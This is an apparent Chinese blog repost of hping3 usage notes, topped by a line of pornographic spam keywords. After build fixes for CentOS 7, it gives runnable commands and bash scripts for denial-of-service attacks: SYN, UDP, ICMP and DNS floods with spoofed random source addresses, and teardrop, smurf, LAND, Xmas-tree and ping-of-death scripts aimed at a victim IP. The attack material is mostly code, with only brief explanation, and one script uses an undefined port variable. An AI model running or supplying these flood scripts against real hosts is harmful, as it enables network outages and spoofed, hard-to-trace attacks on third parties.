日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

hping3 应用笔记

發布時間:2023/12/14 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 hping3 应用笔记 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

安裝

以下步驟用于 在 centos7 下安裝 hping3。

安裝依賴庫

先安裝以下依賴庫:

yum -y install libpcap yum -y install libpcap-devel yum -y install tcl-devel

方式一: yum 安裝

yum -y install hping3

方式二:源碼安裝

# 下載 wget http://www.hping.org/hping3-20051105.tar.gz# 解壓 tar xvf hping3-20051105.tar.gz cd hping3-20051105# 配置 ./configure# 編譯 make # 安裝 make install

問題 1 (configure 時候出錯):

bytesex.h:22:3: error: #error can not find the byte order for this architecture, fix bytesex.h

error can not find the byte order for this architecture, fix bytesex.h

ars.h:190:2: error: #error “Please, edit Makefile and add -DBYTE_ORDER_(BIG|LITTLE)ENDIAN"
#error "Please, edit Makefile and add -DBYTE_ORDER(BIG|LITTLE)_ENDIAN”

原因:

沒有指定 x86_64 下的大小端對齊。

解決方法:

修改 bytesex.h,在 defined(__i386__) 后添加 defined(__x86_64__)。

修改前:

#if defined(__i386__) \|| defined(__alpha__) \|| (defined(__mips__) && (defined(MIPSEL) || defined (__MIPSEL__)))

修改后:

#if defined(__i386__) \|| defined(__x86_64__) \|| defined(__alpha__) \|| (defined(__mips__) && (defined(MIPSEL) || defined (__MIPSEL__)))

問題2 (make 時候出錯):

libpcap_stuff.c:20:21: fatal error: net/bpf.h: No such file or directory

原因:

bpf.h 路徑不正確。

解決方法:

添加軟連接 /usr/local/include/net/bpf.h。

mkdir -p /usr/local/include/net ln -sf /usr/include/pcap-bpf.h /usr/local/include/net/bpf.h

使用

端口掃描

# 通過 eth0 網口,發送 SYN 報文 到 192.168.1.1:80 hping3 -I eth0 -S 192.168.1.1 -p 80

syn flood

默認協議: tcp
默認源端口:隨機
默認源地址:攻擊機的 ip 地址

# 通過 eth0 網口。發送 SYN 報文 到 192.168.1.1:80。偽造源地址為192.168.1.222,時間間隔 1000us。 hping3 -I eth0 -S 192.168.1.1 -p 80 -a 192.168.1.222 -i u1000# 通過 eth0 網口。發送 SYN 報文 到 192.168.1.1:80。偽造隨機源地址,時間間隔 1000us。 hping3 -I eth0 -S 192.168.1.1 -p 80 --rand-source -i u1000# 通過 eth0 網口。發送 SYN 報文 到 192.168.1.1:80。偽造隨機源地址,洪水攻擊。 # 洪水攻擊,速率最快的攻擊。不會顯示數據 和 丟包的統計。 hping3 -I eth0 -S 192.168.1.1 -p 80 --rand-source --flood

-I --interface interface name (otherwise default routing interface)
-S --syn set SYN flag
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-a --spoof spoof source address
–rand-source random source address mode. see the man.
-i --interval wait (uX for X microseconds, for example -i u1000)

–fast alias for -i u10000 (10 packets for second)
–faster alias for -i u1000 (100 packets for second)

udp flood

# 發送 udp 報文 到 192.168.1.1:80。 hping3 --udp 192.168.1.1 -p 80# 發送 udp 報文 到 192.168.1.1:80。偽造隨機源地址,洪水攻擊。 hping3 --udp 192.168.1.1 -p 80 --rand-source --flood

icmp flood

# 發送 icmp 報文 到 192.168.1.1。 hping3 --icmp 192.168.1.1# 發送 icmp 報文 到 192.168.1.1。偽造隨機源地址,洪水攻擊。 hping3 --icmp 192.168.1.1 --rand-source --flood

dns flood

# 發送 udp 報文 到 192.168.1.1:53。偽造隨機源地址,洪水攻擊。 hping3 --udp 192.168.1.1 -p 53 --rand-source --flood

teardrop

Teardrop攻擊是一種拒絕服務攻擊。是基于病態分片數據包的攻擊方法。
其工作原理是向被攻擊者發送多個分片的IP包(IP分片數據包中包括該分片數據包屬于哪個數據包以及在數據包中的位置等信息)。
某些操作系統收到含有重疊偏移的偽造分片數據包時將會出現系統崩潰、重啟等現象。

#!/bin/bashfunction teardrop ( ) {local victim_ip=$1local id_begin=$2local id_end=$3for((id=${id_begin};id<${id_end};id++))dohping3 --icmp ${victim_ip} --data 1000 --id ${id} --count 1 --morefraghping3 --icmp ${victim_ip} --data 200 --id ${id} --count 1 --fragoff 400done }teardrop $*

-x --morefrag set more fragments flag
-d --data data size (default is 0)
-N --id id (default random)
-g --fragoff set the fragment offset
-c --count packet count

SMURF攻擊

Smurf攻擊通過使用將回復地址設置成受害網絡的廣播地址的ICMP應答請求(ping)數據包,來淹沒受害主機,
最終導致該網絡的所有主機都對此ICMP應答請求做出答復,導致網絡阻塞。
更加復雜的Smurf將源地址改為第三方的受害者,最終導致第三方崩潰。

#!/bin/bashfunction smurf ( ) {local victim_ip=$1local broadcast_ip=$2hping3 --icmp ${broadcast_ip} -a ${victim_ip} --flood }smurf $*

XMAS TREE攻擊

TCP所有標志位被設置為1的數據包被稱為圣誕樹數據包(XMas Tree packet),之所以叫這個名是因為這些標志位就像圣誕樹上燈一樣全部被點亮。

hping3 -SFRP 192.168.1.1

LAND攻擊

LAND攻擊方式采用了特別構造的TCP SYN數據包(通常用于開啟一個新的連接),使目標機器開啟一個源地址與目標地址均為自身IP地址的空連接,持續地自我應答,消耗系統資源直至崩潰。這種攻擊方法與SYN洪泛攻擊并不相同。

#!/bin/bashfunction land ( ) {local victim_ip=$1hping3 -S ${victim_ip} -p ${victim_port} -a ${victim_ip} --flood }land $*

Ping of Death攻擊

Ping of Death俗稱“死拼”。
其攻擊原理是攻擊者A向受害者B發送一些尺寸超大的ICMP(Ping命令使用的是ICMP報文)報文對其進行攻擊(對于有些路由器或系統,在接收到一個這樣的報文后,由于處理不當,會造成系統崩潰、死機或重啟)。

#!/bin/bashfunction ping_of_death () {local victim_ip=$1local id=186local data_size=1450let icmp_size=${data_size}+8hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag for i in $(seq 50)dolet offset=${i}*${icmp_size}hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offsetdone }ping_of_death $*

-d --data data size (default is 0)
-x --morefrag set more fragments flag
-g --fragoff set the fragment offset
-N --id id (default random)
-c --count packet count


references

Nmap、Netcat、Hping3工具對比
CentOS 安裝hping3 錯誤以及解決方法
華安解密之DDoS攻防匯總貼
hping3_examples
Smurf攻擊
LAND攻擊
畸形報文攻擊種類及防御

總結

以上是生活随笔為你收集整理的hping3 应用笔记的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。